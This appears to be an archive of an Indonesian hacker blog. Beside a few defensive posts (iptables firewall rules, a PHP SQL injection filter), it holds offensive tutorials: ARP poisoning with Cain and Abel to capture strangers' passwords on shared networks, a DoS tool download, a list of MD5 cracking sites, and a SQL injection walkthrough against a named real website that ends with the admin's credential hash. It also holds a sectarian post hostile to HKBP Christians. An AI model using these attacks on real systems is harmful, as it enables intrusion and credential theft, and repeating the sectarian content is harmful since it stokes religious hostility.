# Generated by iptables-save v1.2.6a on Wed Apr 24 10:19:17 2002*filter:INPUT ACCEPT [404:19766]:FORWARD ACCEPT [0:0]:OUTPUT ACCEPT [530:43376]COMMIT# Completed on Wed Apr 24 10:19:17 2002# Generated by iptables-save v1.2.6a on Wed Apr 24 10:19:17 2002*mangle:PREROUTING ACCEPT [451:22060]:INPUT ACCEPT [451:22060]:FORWARD ACCEPT [0:0]:OUTPUT ACCEPT [594:47151]:POSTROUTING ACCEPT [594:47151]COMMIT# Completed on Wed Apr 24 10:19:17 2002# Generated by iptables-save v1.2.6a on Wed Apr 24 10:19:17 2002*nat:PREROUTING ACCEPT [0:0]:POSTROUTING ACCEPT [3:450]:OUTPUT ACCEPT [3:450]COMMIT# Completed on Wed Apr 24 10:19:17 2002

[iptables-restore]

iptables-restore adalah perintah yang digunakan untuk mengembalikan aturan iptables-set yang disimpan dengan iptables-save

command:iptables-restore [-C] [-n]

-C argumen ini mengembalikan perhitungan byte dan paket yang digunakan jika ingin mengembalikan counter yang telah tersimpan dalam iptables-save, atau dalam bentuk panjangnya --counter

-n argumen ini gunanya untuk mem-flush (menimpa) aturan yang lama yang ditulis dalam table

untuk me-load rule-set dengan iptables-restore salah satunya dengan perintah contoh seperti ini

cat /etc/iptables-save | iptables-restore -c

greetz:mywisdom, petimati, gunslinger, synlord, chaer.newbie, marco(ycl), and all

thanks:devilzc0de, yogyacarderlink, jasakom, kecoak-elektronik, echo, void-labs or voidnetwork

special thanks:my lovely vera...thanks you always beside me when im sad, down, and happy...love you so much

SQL Injection Flaw Patching

2010-10-03T19:17:00.000-07:00

Hmm Seorang hacker jangan hanya bisa melakukan attack, tpi persiapkan juga untuk defendnya seperti membantu admin yg kita depes ato hack melakukan pacth terhadap sitenya ...

Langsung saja...

Patch untuk mencegah serangan SQL Injection di halaman dinamis pada PHP + MySQL.
Biasanya halaman dinamis ini
bentuknya kayak gini http://uhui.com/vuln.php?id=[Input_Angka]

Bentuk umum kode di halaman dinamis php untuk membaca database melalui MySQL :
PHP Code:
$id = htmlentities($_GET['id']);
$variabel = mysql_query("select *from tabeltarget where idtarget='$id'")

Injection Flaw terjadi karena inputnya gak kefilter dengan baik. Sehingga input ‘$id’ yang seharusnya diisi dengan (biasanya) angka bisa diisi dengan query SQL.. Yang mengakibatkan query SQL tersebut dieksekusi sehingga injector bisa melakukan berbagai hal misalnya membaca isi database, membaca suatu file di situs tersebut, dll.

Nah, untuk mencegah hal tersebut sebaiknya kita memfilter inputnya sebelum diproses dengan SQL.

Contoh kode filternya :
PHP Code:
error_reporting(0);
class filter{
function filtering($id){
$idfilter = mysql_real_escape_string($id);
if (!ctype_digit($idfilter))
{
echo "Can't process your request, dude :P ";
exit;
}
else if ($idfilter <= 0)
{
echo "Can't process your request, dude :P ";
exit;
}
else
{
return $id;
}
}
}
$Filter2 = new filter();
$id = htmlentities($_GET['id']);
$secured = $Filter2->filtering($id);
$variabel = mysql_query("select *from tabeltarget where idtarget='$secured'")

Penjelasan :

Pertama-tama menggunakan error_reporting(0); . Kode tersebut digunakan untuk mendisable error reporting sehingga jika terjadi error tidak keluar pesan error.

Selanjutnya variabel $id disaring dulu menggunakan mysql_real_escape_string yang berfungsi untuk menambahkan slash (\) apabila ada tanda kutip pada input $id.

Setelah disaring dengan mysql_real_escape_string, disaring lagi dengan melakukan pengecekan apakah inputnya berupa angka atau bukan dengan menggunakan kode !ctype_digit . Jika ternyata bukan angka maka akan ditolak. Selain pengecekan input apakah angka atau bukan, dilakukan juga pengecekan apakah inputnya sama atau lebih kecil dari 0 (minus) jika iya maka akan ditolak.

Abis itu baru deh aplikasikan ke syntax SQL-nya.

Untuk lebih jelasnya silahkan baca ulang kode sebelum difilter dan setelah difilter berkali-kali sampai paham.

Mencegah serangan Syn & Ping Flood Attack (DOS)

2010-10-03T18:57:00.001-07:00

1. Mencegah paket Syn Flood Attack
Buat sebuah file bernama closesyn.sh yang isinya sebagai berikut untuk mencegah serangan syn flood

#!bin/sh
#Menghapus semua Rule
iptables -F
iptables -X
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
#blok paket syn yang dicurigai jahat
iptables -N synjahat
iptables -A INPUT -p tcp –syn -j synjahat
iptables -A synjahat -m limit –limit 1/s –limit-burst 3 -j ACCEPT
iptables -A synjahat -j DROP

kemudian jalankan di konsole/terminal

root@bt:~# sh closesyn.sh

2. Mencegah Ping Flood attack
Buat sebuah file bernama closeping.sh yang isinya sebagai berikut untuk mencegah serangan ping flood

#!bin/sh
#Menghapus semua Rule
iptables -F
iptables -X
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
#blok paket ping(icmp) yang dicurigai jahat
iptables -N pingjahat
iptables -A INPUT -p icmp -j pingjahat
iptables -A pingjahat -m limit –limit 1/s –limit-burst 2 -j ACCEPT
iptables -A pingjahat -j DROP

root@bt:~# sh closeping.sh

coba lakukan testing dengan perintah

root@bt:~#ping [target] -s 6500

Ok Sekian dulu semoga berguna bagi teman-teman sekalian... terima kasih ^^

Kumpulan md5 crackers online...

2010-10-03T18:44:00.000-07:00

http://www.passcrack.spb.ru/
http://gdataonline.com/seekhash.php
http://www.md5-brute.com/
http://www.md5encryption.com/
http://www.insidepro.com/hashes.php?lang=rus
http://www.cirt.net/cgi-bin/passwd.pl
http://passcracking.ru
http://www.hashchecker.com/?_sls=add_hash
http://www.tydal.nu/category/
http://www.md5-db.com/
http://www.md5hashes.com/
http://sha1search.com/
http://www.milw0rm.com/cracker/
http://www.plain-text.info/add/
http://www.securitystats.com/tools/hashcrack.php
http://md5.xpzone.de/
http://www.csthis.com/md5/
http://www.md5this.com/crack-it-/index.php
http://hackerscity.free.fr/
http://ice.breaker.free.fr/
http://www.md5decrypter.com/
http://securitydb.org/cracker/
http://plain-text.info/index/
http://www.tmto.org/?category=main&page=home
http://md5.geeks.li/
http://hashreverse.com/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://md5crack.it-helpnet.de/index.php?op=add
https://astalavista.net/index.php?
http://md5search.uk.to/
http://74.52.200.226/~b4ck/passhash/index.php
http://www.tmto.org/
http://md5.rednoize.com
http://nz.md5.crysm.net
http://us.md5.crysm.net
http://www.xmd5.org
http://gdataonline.com
http://www.hashchecker.com
http://passcracking.ru
http://www.mil?rm.com/md5
http://plain-text.info
http://www.securitystats.com/tools/hashcrack.php
http://www.schwett.com/md5/ - Does Norwegian words too
http://passcrack.spb.ru/
http://shm.pl/md5/
http://www.und0it.com/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://md5.geeks.li/
http://www.hashreverse.com/
http://www.cmd5.com/english.aspx
http://www.md5.altervista.org/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://alimamed.pp.ru/md5/ (for those who can’t read russian: put your md5 in the second box)
http://md5crack.it-helpnet.de/index.php?op=add
http://cijfer.hua.fi/
http://shm.hard-core.pl/md5/
http://www.mmkey.com/md5/HOME.ASP
http://www.thepanicroom.org/index.php?view=cracker
http://rainbowtables.net/services/results.php
http://rainbowcrack.com/
http://www.securitydb.org/cracker/
http://passwordsecuritycenter.com/in…roducts_ id=7
http://0ptix.co.nr/md5
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com
http://www.pldsecurity.de/forum/md5.php
http://www.xeons.net/genesis/
http://hackerscity.free.fr/
http://bisix.cogia.net/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-crack/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.jock-security.com/md5_database/?page=crack
http://?p-sl0ck.dyndns.org/cracker.php
http://www.blackfiresecurity.com/tools/md5lib.php
http://www.md5-db.com/index.php
http://passcrack.spb.ru/
http://www.hashreverse.com/
http://rainbowcrack.com/
http://www.md5encryption.com/
http://www.shalookup.com/
http://md5.rednoize.com/
http://?p-sl0ck.dyndns.org/cracker.php
http://www.tmto.org/
http://linardy.com/md5.php
http://www.gdataonline.com/seekhash.php
http://search.cpan.org/~blwood/Digest-MD5-Reverse-1.3/
http://www.hashchecker.com/index.php?_sls=search_hash
http://www.rainbowcrack-online.com/
http://schwett.com/md5/
http://www.md5.org.cn/index_en.htm
http://www.xmd5.org/index_en.htm
http://nz.md5.crysm.net/
http://us.md5.crysm.net/
http://gdataonline.com/seekhash.php
http://passcracking.ru/
http://shm.pl/md5/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://www.hashreverse.com/
http://alimamed.pp.ru/md5/
http://md5crack.it-helpnet.de/index.php?op=add
http://shm.hard-core.pl/md5/
http://rainbowcrack.com/
http://passwordsecuritycenter.com/index.ph…pproducts_id=7
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com/
http://hackerscity.free.fr/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-crack/
http://passcracking.com/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.md5-db.com/index.php
http://md5.idiobase.de/
http://md5search.deerme.org/
http://sha1search.com/

Sniff password dengan cain dan abel [ LAN ]

2010-10-03T15:09:00.000-07:00

Download software na di sini : http://www.softpedia.com/get/Security/Decrypting-Decoding/Cain-and-Abel.shtml

Untuk proses installnya gak usah di ajarin ya.. ane anggep semua udah pada bisa…eh ini bisa berjalan dalam 1 jaringan, so kalo kamu ke warnet, orang” yang login FS, FB, dan lainnya bisa didapat user ma passnya. Hal ini juga berlaku di hot spot seperti yang ane lakuin.
langsung aja buka cain + abelnya..
klik start / stop sniffer

Abis itu klik tanda + [warna biru] untuk melakukan scan mac address, maka tampilan akan seperti ini

pada mac address scan langsung klik OK saja
maka akan loading dan didapatkan banyak IP address dalam 1 jaringan dan bisa diketahui mac addressnya

setelah lancar sampai disini kamu bisa langsung ke selanjutnya aja.
Klik APR di tab bagian bawah, dan tampilan akan seperti ini

setelah itu klik tanda + warna biru untuk menambahkan IP address yang ingin di poisoning . tampilan akan seperti ini :

di bagian kiri kamu pilih IP routernya [bagaimana kita tahu IP routernya?... apa perlu dijelasin juga?]
masuk ke cmd dan ketikan ipconfig /all maka akan diketahui segenap informasi. Nah pikir aja sendiri mana yang jadi routernya ya.
yang dibagian kanan adalah IPaddress yang ingin di poisoning. Kalau mau semua 1 jaringan cukup blok semua aja.
Nah abis itu klik ok.
Abis langkah itu maka tampilannya seperti ini

Nah statusnya idle kan? itu tandanya belum di poisoning. Klik start / stop arp dan statusnya akan berubah menjadi poisoning, seperti ini :

Adanya daftar dibawah menandakan bahwa ada proses yang sedang dikerjakan
langsung saja masuk ke dalam password dengan klik tab password di bagian bawah

nah klik dibagian kiri HTTP, dan lihat hasilnya

Nah gimana ?? just simple kan ?

DOS attack + source

2010-10-03T14:40:00.001-07:00

Jalan2 di forum dan website tetangga, ehh dapat tutorial manteb ginian :D
cekidot aja dah ....

DOS TECON-CREW
http://i49.tinypic.com/25k0bbq.jpg

program ini fungsinya untuk melakukan dos attack
feature :

-dos dengan socks 4 dan socks 5
-dos http
-dos dengan menggunakan proxy

downloadnya di sini download na di sini

http://www.4shared.com/file/frncc-eC/d0s.html

Nah silahkan dicoba, moga2 bsa nambah pengetahuan kita ...amin ^^

tutorial sql injection dengan Simple SQLi Dumper v5.1tutorial sql injection dengan Simple SQLi Dumper v5.1

2010-10-03T14:34:00.001-07:00

Tutorial sql injection dengan Simple SQLi Dumper v5.1 .......

persiapan alat perang :

1.rokok
2.cemilan
3.bir
4.cwek untuk nambah semangat nginject :D

Langkah-Langkah Yang Mesti Benar2 Di Perhatikan

1.perl kalau di linux udh ada :D ..nah gmn kalau di windows download di sini "http://www.perl.org/get.html"
2.sqli dumper v.51 ... download di sini "http://www.ziddu.com/download/10540105/ssdp51.tar.gz.html "
trus extrack yang windows extrack di drive C kl linux taruh di folder my documentnya linux .... Pfft

ok udh siapkan sekarang mulai .......

target : http://www.beautycall.co.uk/gallery.php?id=1
dork :inurl:/gallery.php?id=

nah buka jendela terminal for linux ..dan .cmd for windows

step 1 "Find Magic Number / Null Column "-magic"
Command: perl ssdp.pl -u [URL] -magic

example"ketikkan perintah ini
perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1 -magic

dan ini hasilnya .....
--------------------------------------------------------------------------------------------
jimmyromanticdevil@jimmyromanticdevil-laptop:~$ perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1 -magic

[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Date : Sat Jul 3 14:22:10 2010
Help Command: -h, -help, --help

[+] URL: http://www.beautycall.co.uk/gallery.php?id=1
[+] End Tag: --

Attempting to find the magic number...

[+] Testing: 1,2,3,

[+] Field Length : 3
[+] Magic Number : 2,3,
[+] URL Injection: http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3

Showing MySQL Information ...

[+] Database: beautycall_co_uk_web
[+] User: pmowat@localhost
[+] Version: 5.0.67
[+] System: redhat-linux-gnu
[+] Access to "mysql" Database: No
[+] Read File "/etc/passwd": No

Done.

---------------------------------------------------------------------------------------
step 2
find the table
Concat Tables

Command: perl ssdp.pl -u [SQLi URL] -table

contoh ketikkan perintah ini :
perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3 -table

ini hasilnya :

jimmyromanticdevil@jimmyromanticdevil-laptop:~$ perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3 -table

[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Date : Sat Jul 3 14:24:59 2010
Help Command: -h, -help, --help

[+] c0li SQLi URL: http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3
[+] SQLi End Tag: --
[+] Database Name: database()
[+] Number of Tables: 40

Showing tables ...

[1] CITY(6)
[2] COUNTRY(32)
[3] admin(1)
[4] aplicationform(31)
[5] appointment(898)
[6] appointment_event(8)
[7] artist(96)
[8] artist_text_image(1)
[9] city(6)
[10] contact(1)
[11] efranchisee(122)
[12] files(2)
[13] files2(33)
[14] files3(0)
[15] folders(2)
[16] form(158)
[17] franchise(9)
[18] franchiseefolders(8)
[19] galery(20)
[20] homepage(1)
[21] links(26)
[22] links_cat(12)
[23] log(0)
[24] midlands(10)
[25] north(6)
[26] package_image(1)
[27] packages(5)
[28] postcode(122)
[29] regions(8)
[30] register(4)
[31] services(6)
[32] shortform(36)
[33] southeast(14)
[34] southwest(6)
[35] states(11)
[36] subfolders(14)
[37] ukmap(125)
[38] ukpostcodes(104)
[39] vouchers(1)
[40] wales(2)

Done.

--------------------------------------------------------------------------------
nah udh di dapatkan tablenya :D
nah lihat tuh table admin :D
sekarang kita ingin isi colomn admin tersebut .......

step 3
mencari colomn admin
Concat Columns
Required Options: -u, -t

Command: perl ssdp.pl -u [SQLi URL] -d [dbname] -t [tblname] -column
contoh ketikan command ini
perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3 -t admin -column

hasilna seperti ini
---------------------------------------------------------------------------------------
jimmyromanticdevil@jimmyromanticdevil-laptop:~$ perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3 -t admin -column

[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Date : Sat Jul 3 14:38:30 2010
Help Command: -h, -help, --help

[+] c0li SQLi URL: http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3
[+] SQLi End Tag: --
[+] Database Name: database()
[+] Table Name: admin
[+] Number of Columns: 4

Showing columns from table "admin" ...

[+] admin(1): id,username,password,email

Done.

------------------------------------------------------------------------------------

nah itu ada isi colom admin id, username,password dan email ....wah keren yah ini tools Pfft
nah sekarang apa lagi ..

step end

dumping data

now we'll see information inside that column.. Smile

command # perl ssdp.pl -u [c0li URL] -t [table] -c [column],[column] -dump

contoh ketikkan perintah ini "
perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3 -t admin -c username,password -dump

hasilna
-------------------------------------------------------------------------------------
jimmyromanticdevil@jimmyromanticdevil-laptop:~$ perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3 -t admin -c username,password -dump

[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Date : Sat Jul 3 14:43:37 2010
Help Command: -h, -help, --help

[+] c0li SQLi URL: http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3
[+] SQLi End Tag: --

[+] Database Name: database()
[+] Table Name: admin
[+] Column Name: username,password
[+] Data Count: 1

Dumping Data ...

[1] beautycall2010 : d68553e40237bde1465a1da5b199c072

Done.

-----------------------------------------------------------------------------

akhirnya di dapatkan username dan password admin ...

username : beautycall2010
pass: d68553e40237bde1465a1da5b199c072

seee it simple ..and easy ....silahkan di coba ....

Manifesto dan Kode Etik

2010-09-23T23:02:00.001-07:00

Manifesto :

- Ini adalah dunia kami sekarang, dunianya elektron dan switch, keindahan sebuah baud.

- Kami mendayagunakan sebuah sistem yang telah ada tanpa membayar, yang bisa jadi biaya tersebut sangatlah murah jika tidak dijalankan dengan nafsu tamak mencari keuntungan, dan kalian sebut kami kriminal.

- Kami menjelajah, dan kalian sebut kami kriminal.

- Kami mengejar pengetahuan, dan kalian sebut kami kriminal.

- Kami hadir tanpa perbedaan warna kulit, kebangsaan, ataupun prasangka keagamaan, dan kalian sebut kami kriminal.

- Kalian membuat bom atom, kalian menggelar peperangan, kalian membunuh, berlaku curang, membohongi kami dan mencoba meyakinkan kami bahwa semua itu demi kebaikan kami, tetap saja kami yang disebut kriminal.

- Ya, aku memang seorang kriminal.

- Kejahatanku adalah rasa keingintahuanku.

- Kejahatanku adalah karena menilai orang lain dari apa yang mereka katakan dan pikirkan, bukan pada penampilan mereka.

- Kejahatanku adalah menjadi lebih pintar dari kalian, sesuatu yang tak kan kalian maafkan.

- Kalian bisa saja menghentikanku, tetapi kalian tak mungkin menghentikan kami semua.

- Bagaimanapun juga, kami semua senasib seperjuangan.

====================================================================================

Kode Etik:

1. Akses ke sebuah sistem komputer, dan apapun saja dapat mengajarkan mengenai bagaimana dunia bekerja, haruslah tidak terbatas sama sekali

2. Segala informasi haruslah gratis

3. Jangan percaya pada otoritas, promosikanlah desentralisasi

4. Hacker haruslah dinilai dari sudut pandang aktifitas hackingnya, bukan berdasarkan standar organisasi formal atau kriteria yang tidak relevan seperti derajat, usia, suku maupun posisi.

5. Seseorang dapat menciptakan karya seni dan keindahan di komputer

6. Komputer dapat mengubah kehidupan seseorang menjadi lebih baik.

UMAT ISLAM BEKASI VS HKBP

2010-09-17T19:49:00.000-07:00

Dua puluh tahun, umat Islam Bekasi telah menunjukkan KETINGGIAN SIKAP TOLERANSI dan KEBESARAN JIWA terhadap Huria Kristen Batak Protestan (HKBP) dengan membiarkan jemaatnya melakukan kebaktian setiap Ahad di rumah tinggal seorang warga perumahan Mustika Jaya, Ciketing, Bekasi.
Dua puluh tahun, umat Islam Bekasi tidak pernah keberatan, apalagi usil dan mengganggu ibadah Jemaat HKBP di tempat tersebut. Dua puluh tahun, umat Islam Bekasi tetap tidak protes dengan adanya Jemaat HKBP yang datang dari luar perumahan, bahkan luar Bekasi ke tempat tersebut.

Namun, setelah dua puluh tahun, seiring dengan makin banyaknya Jemaat HKBP yangg datang ke tempat tersebut dari berbagai daerah, maka Jemaat HKBP mulai tidak terkendali. Bahkan Jemaat HKBP mulai arogan, tidak ramah lingkungan, tidak menghargai warga sekitar yang mayoritas muslim, seenaknya menutup jalan perumahan untuk setiap kegiatan mereka, bertingkah bak penguasa, merusak tatanan kehidupan bertetangga, menciptakan berbagai problem sosial dan hukum. Puncaknya, HKBP ingin menjadikan rumah tinggal tersebut sebagai GEREJA LIAR.

Setelah dua puluh tahun, umat Islam Bekasi, khususnya warga perumahan Mustika Jaya, Ciketing, mulai gerah dan merasa terganggu dengan pola tingkah Jemaat HKBP yang semakin hari semakin arogan, bahkan nekat memanipulasi perizinan warga sekitar untuk GEREJA LIAR mereka.

Sekali pun kesal, kecewa dan marah, umat Islam Bekasi tetap patuh hukum dan taat undang-undang. GEREJA LIAR HKBP di Ciketing diprotes dan digugat melalui koridor hukum yang sah, sehingga akhirnya GEREJA LIAR tersebut disegel oleh Pemkot Bekasi. Tapi HKBP tetap ngotot dg GEREJA LIARnya, bahkan solusi yang diberikan Pemkot Bekasi untuk dipindahkan ke tempat lain secara sah dan legal pun ditolak.

HKBP menebar FITNAH bahwa umat Islam Bekasi melarang mereka beribadah dan mengganggu rumah ibadah mereka. Lalu secara demonstratif jemaat HKBP setiap Ahad keliling melakukan KONVOI RITUAL LIAR dengan berjalan kaki, dari GEREJA LIAR yang telah disegel ke lapangan terbuka dalam perumahan di depan batang hidung warga muslim Ciketing, dengan menyanyikan lagu-lagu gereja, tanpa mempedulikan perasaan dan kehormatan warga muslim di sana.

Akhirnya, terjadi insiden bentrokan antara HKBP dengan warga muslim Ciketing pada Ahad, 8 Agustus 2010, tiga hari sebelum Ramadhan 1431 H. Dalam insiden tersebut, dua pendeta HKBP sempat mengeluarkan PISTOL dan menembakkannya.

Selanjutnya, tatkala umat Islam Bekasi masih dalam suasana Idul Fithri, pada Ahad 3 Syawwal 1431 H / 12 September 2010 M, Pendeta dan Jemaat HKBP kembali melakukan provokasi dengan menggelar KONVOI RITUAL LIAR sebagaimana yang dulu sering mereka lakukan. Kali ini terjadi insiden bentrokan antara 200 orang HKBP dengan 9 IKHWAN WARGA BEKASI yang berpapasan saat konvoi. Peristiwa tersebut DIDRAMATISIR oleh HKBP sebagai penghadangan dan penusukan pendeta.

Media pun memelintir berita peristiwa tersebut, sehingga terjadi PENYESATAN OPINI. Akhirnya, banyak anggota masyarakat menjadi KORBAN MEDIA, termasuk Presiden sekali pun.

Peristiwa Bekasi Ahad 3 Syawwal 1431 H / 12 Sept 2010 M, BUKAN perencanaan tapi insiden, BUKAN penghadangan tapi perkelahian, BUKAN penusukan tapi tertusuk, karena 9 warga Bekasi yang dituduh sebagai pelaku adalah IKHWAN yang sedang lewat berpapasan dengan KONVOI RITUAL LIAR yang dilakukan 200 HKBP bersama beberapa pendetanya di lingkungan perkampungan warga muslim Ciketing. Lalu terjadi perkelahian, saling pukul, saling serang, saling tusuk dan saling terluka.

Pendeta dan jemaat HKBP yang dirawat di Rumah Sakit dibesuk pejabat tinggi, mendapat perhatian khusus Presiden dan Menteri, namun siapa peduli dengan warga Bekasi yang juga terluka dan dirawat di Rumah Sakit ?. Bahkan salah seorang dari 9 warga Bekasi tersebut, justru ditangkap saat sedang dirawat di sebuah Rumah Sakit akibat luka sabetan senjata tajam HKBP.

Mari gunakan LOGIKA SEHAT: Jika peristiwa tersebut PERENCANAAN, mana mungkin 9 ikhwan melakukannya secara terang-terangan dengan busana muslim dan identitas terbuka ! Jika peristiwa tersebut PENGHADANGAN, mana mungkin 9 orang menghadang 200 orang, apa tidak sebaliknya ?! Jika peristiwa tersebut PENUSUKAN, mana mungkin 9 ikhwan lebam-lebam, luka, patah tangan, bahkan ada yg tertusuk juga !

Soal PENON-AKTIFAN Ketua FPI Bekasi Raya oleh DPP-FPI bukan karena salah, tapi untuk melancarkan roda organisasi FPI Bekasi Raya yang teramat BERAT tantangannya, sekaligus meringankan beban tugas sang Ketua yang sedang menghadapi UJIAN BERAT dalam menghadapi tuduhan dan proses hukum. Jadi, putusan tersebut sudah tepat, dan merupakan langkah brillian dari DPP mau pun DPW FPI Bekasi.

Langkah tersebut bukan saja cerdas, tapi menjadi bukti TRADISI FPI yang berani, tegas dan bertanggung-jawab. Ketua FPI Bekasi Raya, baru disebut-sebut namanya saja oleh pihak kepolisian, sudah dengan gagah langsung serahkan diiri ke Polda Metro Jaya secara sukarela didampingi DPP-FPI untuk diperiksa. Dan siap menjalani proses hukum bila dinilai bertanggung-jawab dalam insiden Bekasi, walaupun beliau tidak ada di lokasi kejadian. Bandingkan dengan SIKAP PENGECUT Pemred Palyboy Erwin Arnada yang melarikan diri dari VONIS DUA TAHUN PENJARA yang sdh ditetapkan Mahkamah Agung sejak 29 Juli 2009. Bandingkan dengan sikap pengecut DEWAN PERS dan LSM KOMPRADOR yang berusaha melindungi dan membantu Sang TERORIS MORAL tersebut dari putusan tetap Mahkamah Agung.

Bagi segenap pengurus, anggota, aktivis, laskar dan simpatisan FPI dari Pusat hingga ke Daerah, bahwa Ketua FPI Bekasi Raya adalah PEJUANG bukan pecundang. Beliau TIDAK ADA DI LOKASI kejadian saat peristiwa. Beliau hanya kirim SMS AJAKAN kpd umat Islam untuk membela warga Ciketing beberapa hari sebelum peristiwa, tapi dituduh sebagai provokator, sedang para Pendeta HKBP yang mengajak, membawa dan memimpin massa Kristen serta memprovokasi warga muslim dengan KONVOI RITUAL LIAR, tak satu pun diperiksa.

Kini yang menjadi pertanyaan adalah :

1. Kenapa para Pendeta HKBP yang jadi PROVOKATOR dan PENGACAU tidak diperiksa ?

2. Kenapa kegiatan HKBP setiap Ahad di Ciketing yg menggelar KONVOI RITUAL LIAR keliling perumahan warga muslim dengan lagu-lagu Gereja secara demonstratif dibiarkan ?

3. Kenapa dua pendeta yang bawa PISTOL dan menembakannya ke warga pada insiden 8 Agustus 2010 tidak ditangkap ?

4. Kenapa dua jemaat HKBP, Purba dan Sinaga, yang bawa PISAU saat insiden 12 September 2010 sudah ditangkap lalu dilepas kembali ?

5. Kenapa jemaat HKBP yang memukul dan menusuk 9 ikhwan warga Bekasi tidak ditangkap ?

6. Kenapa Presiden dan Para Menteri serta pejabat dan sederetan Tokoh Nasional memberikan simpatik kepada PENGACAU sambil menyalahkan warga muslim Bekasi ?

7. Kenapa banyak pihak senang mengambil kesimpulan dan keputusan hanya berdasarkan OPINI dan ISSUE media ?

8. Kenapa di Indonesia yang merupakan negeri mayoritas muslim terbesar di dunia, justru yg terjadi adalah MAYORITAS TERTINDAS OLEH TIRANI MINORITAS ?

9. Kenapa MINORITAS di Indonesia terlalu dimanjakan, sehingga mereka jadi tidak tahu diri, bahkan menjadi angkuh dan sok jago ?

10. Kenapa ketika terjadi insiden kecil terhadap SEORANG PENDETA semua teriak nyaring, tapi ketika RIBUAN umat Islam dibantai di Ambon, Sampit dan Poso teriakan macam itu tak terdengar ?

Laa ilaaha illallaah, Muhammadur Rasuulullaah. Jawablah semua pertanyaan tsb dengan jiwa bersih dan akal sehat serta argumentasi Syariat.

Oleh sebab itu, Keadilan harus ditegakkan ! Hukum tidak pilih kasih ! Jika 9 Ikhwan warga Bekasi sudah ditahan karena dituduh terlibat langsung dalam perkelahian tersebut, dan Ketua FPI Bekasi Raya pun sudah ditahan karena dituduh terlibat secara tidak langsung, maka mereka yg terlibat langsung maupun tidak langsung dari kelompok HKBP harus ditahan juga !

Karenanya, segenap pengacara Bantuan Hukum Front (BHF) dari DPP-FPI dan Kongres Umat Islam Bekasi (KUIB) akan tetap dan terus berjuang melakukan pembelaan hukum terhadap Ketua FPI Bekasi Raya dan seluruh warga Bekasi yang ditahan akibat peristiwa tersebut. Tekad Bulat BHF dan KUIB adalah membuktikan bahwa mereka TIDAK BERSALAH, karena mereka hanya KORBAN AROGANSI HKBP dan OPINI SESAT MEDIA MASSA. Bahkan BHF dan KUIB akan tetap dan terus berjuang membela hak-hak warga Ciketing yang selama ini dirampas dan dirusak oleh HKBP.

Bekasi kota religi. Bekasi kota Islami. Siapa ingin kotori atau kacaukan Bekasi silakan keluar dari Bekasi !

Sebar luaskan berita ini agar umat Islam tidak menjadi KORBAN MEDIA !

Hasbunallaahu wa Ni’mal Wakiil, Ni’mal Maulaa wa Ni’man Nashiir.

http://aqse.multiply.com/journal/item/521/UMAT_ISLAM_BEKASI_VS_HKBP

Read more: http://ibnux.net/2010/09/umat-islam-bekasi-vs-hkbp.html#ixzz0zqUk5ABK

All About Hacking

2010-09-15T14:14:00.000-07:00

Hacker muncul pada awal tahun 1960-an diantara para anggota organisasi mahasiswa Tech Model Railroad Club di Laboratorium Kecerdasan Artifisial Massachusetts Institute of Technology (MIT). Kelompok mahasiswa tersebut merupakan salah satu perintis perkembangan teknologi komputer dan mereka beroperasi dengan sejumlah komputer mainframe. Kata hacker pertama kali muncul dengan arti positif untuk menyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat program komputer yang lebih baik dari yang telah dirancang bersama. Kemudian pada tahun 1983, analogi hacker semakin berkembang untuk menyebut seseorang yang memiliki obsesi untuk memahami dan menguasai sistem komputer.

